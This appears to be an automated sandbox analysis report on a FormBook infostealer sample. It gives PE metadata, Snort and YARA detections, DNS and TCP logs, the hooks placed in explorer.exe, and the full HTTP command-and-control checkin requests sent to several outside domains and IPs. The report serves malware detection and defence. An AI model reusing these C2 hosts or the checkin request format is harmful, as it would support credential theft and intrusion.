                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1db940xdc.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x1a78.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x270000x114c.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1d6e00x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x180000x1c8.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x16d3a0x16e00False0.570835467896data6.67299232216IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rdata0x180000x64f80x6600False0.572150735294data6.01720541218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x1f0000x50980x3400False0.285456730769data4.69747681351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                            .rsrc0x250000x1a780x1c00False0.9462890625data7.76883960412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x270000x17980x1800False0.608561197917data5.57094653631IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_RCDATA0x250700x1a05dataEnglishUnited States

                                            Imports

                                            DLLImport
                                            KERNEL32.dllRaiseException, ReadConsoleW, ReadFile, CreateFileW, WriteConsoleW, GetStringTypeW, LCMapStringEx, SetConsoleCursorPosition, LoadLibraryW, GetModuleHandleW, HeapReAlloc, HeapSize, OutputDebugStringW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, GetStdHandle, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetCurrentThreadId, SetLastError, GetCPInfo, GetOEMCP, GetACP, EncodePointer, DecodePointer, GetLastError, InterlockedDecrement, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, GetLocalTime, GetCommandLineA, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, HeapFree, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetFileType, DeleteCriticalSection, InitOnceExecuteOnce, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetCurrentProcess, TerminateProcess, WriteFile, GetModuleFileNameW, Sleep, LoadLibraryExW, InterlockedIncrement, IsValidCodePage, SetEndOfFile
                                            msi.dll
                                            loadperf.dllLoadPerfCounterTextStringsA, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA
                                            MSVFW32.dllStretchDIB
                                            AVIFIL32.dllAVIFileExit, AVIStreamReadData
                                            pdh.dllPdhEnumObjectsW, PdhSetQueryTimeRange, PdhGetDllVersion
                                            WSOCK32.dllWSASetBlockingHook, WSACancelAsyncRequest, bind, ord1104, ord1108, ord1130
                                            GDI32.dllStartDocW, GdiGetSpoolFileHandle, PolyBezier
                                            MAPI32.dll
                                            MSACM32.dllacmDriverPriority, acmFilterTagDetailsA

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/13/21-21:48:09.018441TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6161.35.25.247
                                            01/13/21-21:48:09.018441TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6161.35.25.247
                                            01/13/21-21:48:09.018441TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6161.35.25.247

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 21:47:46.360791922 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.488919020 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:47:46.489022970 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.489367962 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.616822958 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:47:46.651639938 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:47:46.651665926 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:47:46.651837111 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.651880026 CET4974680192.168.2.618.209.115.26
                                            Jan 13, 2021 21:47:46.779654980 CET804974618.209.115.26192.168.2.6
                                            Jan 13, 2021 21:48:08.976949930 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.017882109 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:48:09.018162012 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.018440962 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.058419943 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:48:09.058456898 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:48:09.058465004 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:48:09.058763981 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.058902025 CET4974880192.168.2.6161.35.25.247
                                            Jan 13, 2021 21:48:09.098886013 CET8049748161.35.25.247192.168.2.6
                                            Jan 13, 2021 21:49:10.731152058 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:10.974504948 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:10.974662066 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:10.974819899 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:11.218736887 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:11.219010115 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:11.219032049 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:11.219048023 CET8049755112.213.89.130192.168.2.6
                                            Jan 13, 2021 21:49:11.219305992 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:11.219439983 CET4975580192.168.2.6112.213.89.130
                                            Jan 13, 2021 21:49:11.463022947 CET8049755112.213.89.130192.168.2.6

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 21:46:35.689513922 CET6026153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:35.737133980 CET53602618.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:36.498744011 CET5606153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:36.546652079 CET53560618.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:37.325687885 CET5833653192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:37.376445055 CET53583368.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:38.430398941 CET5378153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:38.478130102 CET53537818.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:39.249034882 CET5406453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:39.308801889 CET53540648.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:40.519951105 CET5281153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:40.570771933 CET53528118.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:41.302488089 CET5529953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:41.359087944 CET53552998.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:42.295033932 CET6374553192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:42.345844984 CET53637458.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:44.055450916 CET5005553192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:44.103316069 CET53500558.8.8.8192.168.2.6
                                            Jan 13, 2021 21:46:45.024713039 CET6137453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:46:45.075690031 CET53613748.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:05.041726112 CET5033953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:05.089576960 CET53503398.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:18.093296051 CET6330753192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:18.151318073 CET53633078.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:23.192512035 CET4969453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:23.243278980 CET53496948.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:24.582165003 CET5498253192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:24.648821115 CET53549828.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:31.226372004 CET5001053192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:31.284768105 CET53500108.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:37.087724924 CET6371853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:37.147120953 CET53637188.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:37.889822960 CET6211653192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:37.946158886 CET53621168.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:38.517600060 CET6381653192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:38.576761007 CET53638168.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:38.998594046 CET5501453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:39.058088064 CET53550148.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:39.576025009 CET6220853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:39.636415958 CET53622088.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:40.263968945 CET5757453192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:40.277487993 CET5181853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:40.312587976 CET53575748.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:40.378937006 CET53518188.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:41.109539986 CET5662853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:41.165824890 CET53566288.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:42.006177902 CET6077853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:42.062701941 CET53607788.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:42.910536051 CET5379953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:42.961646080 CET53537998.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:43.443485975 CET5468353192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:43.491538048 CET53546838.8.8.8192.168.2.6
                                            Jan 13, 2021 21:47:46.268156052 CET5932953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:47:46.354010105 CET53593298.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:08.906971931 CET6402153192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:08.975737095 CET53640218.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:10.290030003 CET5612953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:10.346292019 CET53561298.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:14.588618040 CET5817753192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:14.636603117 CET53581778.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:29.235683918 CET5070053192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:29.601576090 CET53507008.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:31.663353920 CET5406953192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:31.735148907 CET53540698.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:34.872498989 CET6117853192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:34.920453072 CET53611788.8.8.8192.168.2.6
                                            Jan 13, 2021 21:48:49.786048889 CET5701753192.168.2.68.8.8.8
                                            Jan 13, 2021 21:48:50.009089947 CET53570178.8.8.8192.168.2.6
                                            Jan 13, 2021 21:49:10.424647093 CET5632753192.168.2.68.8.8.8
                                            Jan 13, 2021 21:49:10.729964972 CET53563278.8.8.8192.168.2.6
                                            Jan 13, 2021 21:49:31.368076086 CET5024353192.168.2.68.8.8.8
                                            Jan 13, 2021 21:49:31.721117973 CET53502438.8.8.8192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 13, 2021 21:47:46.268156052 CET192.168.2.68.8.8.80xc3a2Standard query (0)www.7852bigbucktrail.infoA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:08.906971931 CET192.168.2.68.8.8.80x365bStandard query (0)www.toastxpress.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:29.235683918 CET192.168.2.68.8.8.80x22bStandard query (0)www.grayfoxden.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:49.786048889 CET192.168.2.68.8.8.80x20dfStandard query (0)www.catatan-matematika.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:49:10.424647093 CET192.168.2.68.8.8.80x8ffcStandard query (0)www.unitvn.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:49:31.368076086 CET192.168.2.68.8.8.80xe3eaStandard query (0)www.monkeytrivia.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 13, 2021 21:47:46.354010105 CET8.8.8.8192.168.2.60xc3a2No error (0)www.7852bigbucktrail.info7852bigbucktrail.infoCNAME (Canonical name)IN (0x0001)
                                            Jan 13, 2021 21:47:46.354010105 CET8.8.8.8192.168.2.60xc3a2No error (0)7852bigbucktrail.info18.209.115.26A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:47:46.354010105 CET8.8.8.8192.168.2.60xc3a2No error (0)7852bigbucktrail.info18.208.10.167A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:47:46.354010105 CET8.8.8.8192.168.2.60xc3a2No error (0)7852bigbucktrail.info18.210.178.226A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:08.975737095 CET8.8.8.8192.168.2.60x365bNo error (0)www.toastxpress.com161.35.25.247A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:48:50.009089947 CET8.8.8.8192.168.2.60x20dfNo error (0)www.catatan-matematika.comghs.google.comCNAME (Canonical name)IN (0x0001)
                                            Jan 13, 2021 21:49:10.729964972 CET8.8.8.8192.168.2.60x8ffcNo error (0)www.unitvn.com112.213.89.130A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:49:31.721117973 CET8.8.8.8192.168.2.60xe3eaNo error (0)www.monkeytrivia.com156.238.82.35A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.7852bigbucktrail.info
                                            • www.toastxpress.com
                                            • www.unitvn.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.64974618.209.115.2680C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:47:46.489367962 CET5902OUTGET /krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1
                                            Host: www.7852bigbucktrail.info
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:47:46.651639938 CET5903INHTTP/1.1 301 Moved Permanently
                                            Date: Wed, 13 Jan 2021 20:47:46 GMT
                                            Server: Apache
                                            Location: https://www.atproperties.com/10821807/nei?&ref=TQK&pt=&agent=8578
                                            Content-Length: 0
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.649748161.35.25.24780C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:48:09.018440962 CET5904OUTGET /krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1
                                            Host: www.toastxpress.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:48:09.058456898 CET5904INHTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Wed, 13 Jan 2021 20:48:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 178
                                            Connection: close
                                            Location: https://www.toastxpress.com/krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.649755112.213.89.13080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:49:10.974819899 CET5966OUTGET /krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1
                                            Host: www.unitvn.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:49:11.219010115 CET5967INHTTP/1.1 404 Not Found
                                            Connection: close
                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                            Pragma: no-cache
                                            Content-Type: text/html
                                            Content-Length: 1237
                                            Date: Wed, 13 Jan 2021 20:49:10 GMT
                                            Server: LiteSpeed
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70
                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSp


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: user32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE5
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE5

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:21:46:41
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\RRW9901200241.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\RRW9901200241.exe'
                                            Imagebase:0xd80000
                                            File size:333312 bytes
                                            MD5 hash:61FFB4AD4721F51413075923B2E9468D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:21:46:43
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\RRW9901200241.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\RRW9901200241.exe'
                                            Imagebase:0xd80000
                                            File size:333312 bytes
                                            MD5 hash:61FFB4AD4721F51413075923B2E9468D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
